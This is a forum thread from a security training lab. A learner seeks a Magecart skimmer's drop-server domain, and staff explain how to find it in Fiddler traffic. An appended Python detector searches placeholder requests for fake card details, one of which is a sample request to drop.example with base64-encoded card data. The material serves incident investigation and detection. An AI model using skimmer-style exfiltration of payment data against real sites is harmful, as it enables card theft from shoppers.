GusC
Bronze III
2 months ago

Events & Breaches: Magecart Skimmer

Hello - I need a hand locating the domain. (Q7) 

I've found the name of the file that contains the skimmer, then exported that. I have then opened that in a text editor and searched for "http://" and "https://" in the big chunk of text, but nothing is matching.

  • KieranRowley
    Community Manager

    Hi GusC, I see there have been no replies on this one so far, so I have forwarded your question to the lab author.

  • Hi Gus! 

    Thank you for raising this! To locate the domain of the drop server, the user needs to navigate to the website and check out using fake/random details. Then, you will be able to find the drop server domain used by the skimmer in Fiddler.

    Let me know if you have any additional questions. 

    • GusC
      Bronze III

      Hi Madeline - I had done that previously. I'm still stuck. 

      I went to checkout, then only when about to complete checkout with fake card data I launched Fiddler to capture. Once checkout had completed I closed Firefox. Then I exported all sessions as raw files, then grepped the results using:

      grep -Eorh 'https?://[^[:space:]]+'

      None of the results match Q7. 

       

  • GusC
    Bronze III

    Got it now - thanks all - the answer was right in front of me, as usual. 

    • ChrisWood
      Immerser

      Once you finish the checkout, look for a request sent to another server with the unencrypted details. You can do this inside of Fiddler. Alternatively, you can search for the fake information you entered, which should help you find what you're looking for!
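
The search described in the replies above (find a request to another server that carries the fake checkout details), as an added example that is not part of the original thread or the lab. It goes beyond the plain-text case by also checking URL-encoded and base64-encoded bodies; the hosts, session text and fake details are constructed placeholders.

```python
import base64
import re
from urllib.parse import quote, unquote, unquote_plus

FAKE = ["4111111111111111", "Test User"]  # constructed details typed at checkout
_blob = quote(base64.b64encode(b'{"card":"4111111111111111","name":"Test User"}').decode())
# Constructed raw requests standing in for exported sessions; all hosts are placeholders.
SESSIONS = [
    "POST https://shop.example/checkout HTTP/1.1\r\nHost: shop.example\r\n\r\n"
    "card=4111111111111111&name=Test+User",
    "GET https://cdn.example/lib.js HTTP/1.1\r\nHost: cdn.example\r\n\r\n",
    "POST https://drop.example/c HTTP/1.1\r\nHost: drop.example\r\n\r\nd=" + _blob,
]

def host_of(raw):
    """Return the lower-cased Host header value of a raw request, or None."""
    m = re.search(r"^Host:\s*(\S+)", raw, re.I | re.M)
    return m.group(1).lower() if m else None

def views(text):
    """Yield text as sent, form-decoded, and with base64-looking runs decoded."""
    yield text
    yield unquote_plus(text)
    for run in re.findall(r"[A-Za-z0-9+/]{16,}={0,2}", unquote(text)):
        try:
            yield base64.b64decode(run + "=" * (-len(run) % 4)).decode("utf-8", "ignore")
        except ValueError:  # not valid base64 after all
            continue

def find_exfil(sessions, first_party, markers):
    """Return (host, markers found) for requests to hosts other than first_party."""
    hits = []
    for raw in sessions:
        host = host_of(raw)
        if host is None or host == first_party or host.endswith("." + first_party):
            continue
        head, _, body = raw.partition("\r\n\r\n")
        # Check the request line too: data can leave in a query string.
        seen = list(views(head.split("\r\n", 1)[0] + "\n" + body))
        found = sorted({m for m in markers if any(m in s for s in seen)})
        if found:
            hits.append((host, found))
    return hits

if __name__ == "__main__":
    for host, found in find_exfil(SESSIONS, "shop.example", FAKE):
        print(host, found)
```

A plain text search for the card number finds only the first-party checkout request here, because the third-party request carries it base64-encoded.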